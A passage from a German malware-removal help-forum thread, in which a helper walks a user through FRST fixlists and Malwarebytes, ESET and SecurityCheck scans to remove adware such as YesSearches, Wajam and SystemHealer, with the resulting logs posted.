  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-20 19:21:19.595
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-20 19:21:19.499
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i7-2600K CPU @ 3.40GHz
Prozentuale Nutzung des RAM: 27%
Installierter physikalischer RAM: 8173.24 MB
Verfügbarer physikalischer RAM: 5894.66 MB
Summe virtueller Speicher: 16877.24 MB
Verfügbarer virtueller Speicher: 14370.07 MB

==================== Laufwerke ================================

Drive a: (Harun) (Fixed) (Total:931.51 GB) (Free:774.43 GB) NTFS
Drive c: (Windows) (Fixed) (Total:59.09 GB) (Free:14.48 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 59.6 GB) (Disk ID: D9E74E88)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=59.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4D282A8D)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================
Bittesehr :)

Ist das normal wenn ich den Code hier eingebe das der sehr träge und langsam schreibt ? Der kommt sozusagen mit dem schreiben nicht mit -.-

Alles andere ist wie immer flüssig

cosinus 21.04.2016 09:52
FRST-Fix

Virenscanner jetzt bitte komplett deaktivieren, damit sichergestellt ist, dass der Fix sauber durchläuft!

Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com [nicht gefunden]
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\firefox@browser-security.de.xpi [nicht gefunden]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\abs@avira.com [2015-10-26] [ist nicht signiert]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\abs@avira.com [2016-03-08] [ist nicht signiert]
Task: {114F0918-4CBC-4DF3-89CF-6EF208E7497C} - \ffgogogoBrowserUpdateUA -> Keine Datei <==== ACHTUNG
Task: {55B0D6D1-C72E-49EF-B7F0-5C87D9BFE997} - \eAHPeNhIUJCheckTask -> Keine Datei <==== ACHTUNG
Task: {5D51534D-F177-4E19-B56B-21112F1A3483} - \ffgogogoBrowserUpdateCore -> Keine Datei <==== ACHTUNG
Task: {671B6DA2-50FC-4121-874E-571D617F7B32} - \eAHPeNhIUJBrowserUpdateCore -> Keine Datei <==== ACHTUNG
Task: {C4675849-A54C-4834-BC5A-7D6ABA4BBB54} - \eAHPeNhIUJBrowserUpdateUA -> Keine Datei <==== ACHTUNG
Task: {CB480BD6-186E-467C-B81B-091E970277CF} - \ffgogogoCheckTask -> Keine Datei <==== ACHTUNG
emptytemp:

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.


StOony 21.04.2016 12:36
Fixlog

Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-21 13:34:33) Run:3
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com [nicht gefunden]
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\firefox@browser-security.de.xpi [nicht gefunden]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\abs@avira.com [2015-10-26] [ist nicht signiert]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\abs@avira.com [2016-03-08] [ist nicht signiert]
Task: {114F0918-4CBC-4DF3-89CF-6EF208E7497C} - \ffgogogoBrowserUpdateUA -> Keine Datei <==== ACHTUNG
Task: {55B0D6D1-C72E-49EF-B7F0-5C87D9BFE997} - \eAHPeNhIUJCheckTask -> Keine Datei <==== ACHTUNG
Task: {5D51534D-F177-4E19-B56B-21112F1A3483} - \ffgogogoBrowserUpdateCore -> Keine Datei <==== ACHTUNG
Task: {671B6DA2-50FC-4121-874E-571D617F7B32} - \eAHPeNhIUJBrowserUpdateCore -> Keine Datei <==== ACHTUNG
Task: {C4675849-A54C-4834-BC5A-7D6ABA4BBB54} - \eAHPeNhIUJBrowserUpdateUA -> Keine Datei <==== ACHTUNG
Task: {CB480BD6-186E-467C-B81B-091E970277CF} - \ffgogogoCheckTask -> Keine Datei <==== ACHTUNG
emptytemp:
       
*****************

C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com => nicht gefunden.
C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\firefox@browser-security.de.xpi => nicht gefunden.
C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\abs@avira.com => erfolgreich verschoben
C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\abs@avira.com => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{114F0918-4CBC-4DF3-89CF-6EF208E7497C}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{114F0918-4CBC-4DF3-89CF-6EF208E7497C}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ffgogogoBrowserUpdateUA" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{55B0D6D1-C72E-49EF-B7F0-5C87D9BFE997}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{55B0D6D1-C72E-49EF-B7F0-5C87D9BFE997}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\eAHPeNhIUJCheckTask" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5D51534D-F177-4E19-B56B-21112F1A3483}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5D51534D-F177-4E19-B56B-21112F1A3483}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ffgogogoBrowserUpdateCore" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{671B6DA2-50FC-4121-874E-571D617F7B32}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{671B6DA2-50FC-4121-874E-571D617F7B32}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\eAHPeNhIUJBrowserUpdateCore" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C4675849-A54C-4834-BC5A-7D6ABA4BBB54}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C4675849-A54C-4834-BC5A-7D6ABA4BBB54}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\eAHPeNhIUJBrowserUpdateUA" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CB480BD6-186E-467C-B81B-091E970277CF}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB480BD6-186E-467C-B81B-091E970277CF}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ffgogogoCheckTask" => Schlüssel erfolgreich entfernt
EmptyTemp: => 213.2 MB temporäre Dateien entfernt.


Das System musste neu gestartet werden.

==== Ende von Fixlog 13:34:34 ====

StOony 24.04.2016 14:57
Nicht falsch verstehen, nur geht es hier weiter ? Bin seit Tagen ohne Antivir Programm..

cosinus 24.04.2016 20:10
Das ist doch totaler Quatsch. Du hast den Windows Defender der bei W10 dabei ist...aber hauptsache erstmal Panik schieben und dabei auch noch vergessen, dass du trotz Virenscanner Müll rienbekommen hast :wtf:

Okay, dann Kontrollscans mit (1) MBAM, (2) ESET und (3) SecurityCheck bitte:


1. Schritt: MBAM

Downloade Dir bitte Malwarebytes Anti-Malware
  • Installiere das Programm in den vorgegebenen Pfad. (Bebilderte Anleitung zu MBAM)
  • Starte Malwarebytes' Anti-Malware (MBAM).
  • Klicke im Anschluss auf Scannen, wähle den Bedrohungssuchlauf aus und klicke auf Suchlauf starten.
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Auswahl entfernen.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM, klicke auf Verlauf und dann auf Anwendungsprotokolle.
  • Wähle das neueste Scan-Protokoll aus und klicke auf Export. Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab. Das Logfile von MBAM findest du hier.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.




2. Schritt: ESET

ESET Online Scanner

  • Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
  • Lade und starte Eset Online Scanner
  • Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
  • Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
  • Klicke auf Starten.
  • Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
  • Klicke am Ende des Suchlaufs auf Fertig stellen.
  • Schließe das Fenster von ESET.
  • Explorer öffnen.
  • C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
  • Logfile hier posten.
  • Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
  • Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset




3. Schritt: SecurityCheck

Downloade Dir bitte SecurityCheck und:

  • Speichere es auf dem Desktop.
  • Starte SecurityCheck.exe und folge den Anweisungen in der DOS-Box.
  • Wenn der Scan beendet wurde sollte sich ein Textdokument (checkup.txt) öffnen.
Poste den Inhalt bitte hier.

StOony 24.04.2016 22:18
So ich hab alles gemacht, nur ist es nicht eigentlich normal wenn ein Leihe wie ich "Panik" schiebe ?

MBAM 1

Code:
Malwarebytes Anti-Malware
www.malwarebytes.org


Protection, 24.04.2016 22:02, SYSTEM, HARUN-PC, Protection, Malware Protection, Starting,
Protection, 24.04.2016 22:02, SYSTEM, HARUN-PC, Protection, Malware Protection, Started,
Protection, 24.04.2016 22:02, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 24.04.2016 22:02, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, Remediation Database, 2016.2.12.1, 2016.4.19.1,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, Rootkit Database, 2016.2.8.1, 2016.4.17.1,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, Domain Database, 2016.2.16.8, 2016.4.22.6,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, Malware Database, 2016.2.16.6, 2016.4.24.5,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, IP Database, 2016.2.8.1, 2016.4.7.1,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Refresh, Starting,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopping,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopped,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Refresh, Success,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,
Scan, 24.04.2016 22:07, SYSTEM, HARUN-PC, Manual, Start: 24.04.2016 22:03, Dauer: 3 Min. 36 Sek., Bedrohungssuchlauf, Abgeschlossen, 0 Malware-Erkennung, 277 Nicht-Malware-Erkennungen,
Protection, 24.04.2016 22:08, SYSTEM, HARUN-PC, Protection, Malware Protection, Starting,
Protection, 24.04.2016 22:08, SYSTEM, HARUN-PC, Protection, Malware Protection, Started,
Protection, 24.04.2016 22:08, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 24.04.2016 22:08, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,

(end)
MBAM 2

Code:
Malwarebytes Anti-Malware
www.malwarebytes.org

Suchlaufdatum: 24.04.2016
Suchlaufzeit: 22:03
Protokolldatei: MBAM 2.txt
Administrator: Ja

Version: 2.2.1.1043
Malware-Datenbank: v2016.04.24.05
Rootkit-Datenbank: v2016.04.17.01
Lizenz: Testversion
Malware-Schutz: Aktiviert
Schutz vor bösartigen Websites: Aktiviert
Selbstschutz: Deaktiviert

Betriebssystem: Windows 10
CPU: x64
Dateisystem: NTFS
Benutzer: Harun

Suchlauftyp: Bedrohungssuchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 456629
Abgelaufene Zeit: 3 Min., 36 Sek.

Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 0
(keine bösartigen Elemente erkannt)

Module: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 11
PUP.Optional.YesSearches, HKU\S-1-5-18\SOFTWARE\{A16B1AF7-982D-40C3-B5C1-633E1A6A6678}, In Quarantäne, [f6af59590e8b1d1915e07f4525dde21e],
PUP.Optional.YesSearches, HKU\S-1-5-21-2630849102-760198568-3561441068-1000\SOFTWARE\{A16B1AF7-982D-40C3-B5C1-633E1A6A6678}, In Quarantäne, [9510882ae6b3e65054a1e2e2bb472bd5],
PUP.Optional.YesSearches, HKLM\SOFTWARE\{A16B1AF7-982D-40C3-B5C1-633E1A6A6678}, In Quarantäne, [297c04ae9aff64d2bc39a3217191926e],
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32LDR  , In Quarantäne, [c7ded2e0e8b1ee48cb5f6ae98183c040],
PUP.Optional.IFEO, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SKYPE.EXE, In Quarantäne, [6a3bab078f0a2214c849e54fe22244bc],
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}, In Quarantäne, [edb8971b9306ff371f5728166c97a957],
PUP.Optional.IFEO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SKYPE.EXE, In Quarantäne, [b6ef159dfd9cc175f51c84b0a1639868],
PUP.Optional.Wajam, HKU\S-1-5-21-2630849102-760198568-3561441068-1004\SOFTWARE\WajIEnhance, In Quarantäne, [2a7b0ca6d2c7f640e800b3a2fa0abb45],
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1004\SOFTWARE\SYSTEM HEALER, In Quarantäne, [267fefc37821082ec6aeabe5c83c1be5],
PUP.Optional.Wajam, HKU\S-1-5-21-2630849102-760198568-3561441068-1009\SOFTWARE\WajIEnhance, In Quarantäne, [6f363b778a0fb185da0eee67e2221fe1],
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1009\SOFTWARE\SYSTEM HEALER, In Quarantäne, [5e471a98a7f22b0bf87cd3bd7391da26],

Registrierungswerte: 11
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32Ldr  |{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131019213678783523, In Quarantäne, [c7ded2e0e8b1ee48cb5f6ae98183c040]
PUP.Optional.IFEO, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SKYPE.EXE|Debugger, "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe", In Quarantäne, [6a3bab078f0a2214c849e54fe22244bc]
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|hp, hxxp://www.yessearches.com/?ts=AHEpBnEoBn0qB0..&v=20160301&uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&mode=ffsengext, In Quarantäne, [edb8971b9306ff371f5728166c97a957]
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|tab, hxxp://www.yessearches.com/?ts=AHEpBnEoBn0qB0..&v=20160301&uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&mode=ffsengext, In Quarantäne, [a203fcb62178cc6a04723806857e728e]
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|sp, hxxp://www.yessearches.com/chrome.php?uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&q={searchTerms}&ts=AHEpBnEoBn0qB0..&v=20160301&mode=ffsengext, In Quarantäne, [7233bef4e9b00630db9bf648877c7789]
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|surl, hxxp://www.yessearches.com/chrome.php?uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&ts=AHEpBnEoBn0qB0..&v=20160301&mode=ffexttoolbar&q=, In Quarantäne, [4e570fa36f2a5dd993e396a8c043a65a]
PUP.Optional.IFEO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SKYPE.EXE|Debugger, "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe", In Quarantäne, [b6ef159dfd9cc175f51c84b0a1639868]
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1004\SOFTWARE\SYSTEM HEALER|HomePage, hxxp://systemhealer.com/, In Quarantäne, [267fefc37821082ec6aeabe5c83c1be5]
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1004\SOFTWARE\SYSTEM HEALER|SupportPage, hxxp://systemhealer.com/support/#contact, In Quarantäne, [f7ae62508d0c57df650f632d11f306fa]
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1009\SOFTWARE\SYSTEM HEALER|HomePage, hxxp://systemhealer.com/, In Quarantäne, [5e471a98a7f22b0bf87cd3bd7391da26]
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1009\SOFTWARE\SYSTEM HEALER|SupportPage, hxxp://systemhealer.com/support/#contact, In Quarantäne, [4f56e5cd9ffa39fd462e98f80df76f91]

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Ordner: 60
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\bookmarkbackups, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\crashes, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\crashes\events, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting\archived, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting\archived\2015-10, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\base, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\engines, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\dnt-api, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\blocked, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\background, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\search, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests\reports, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
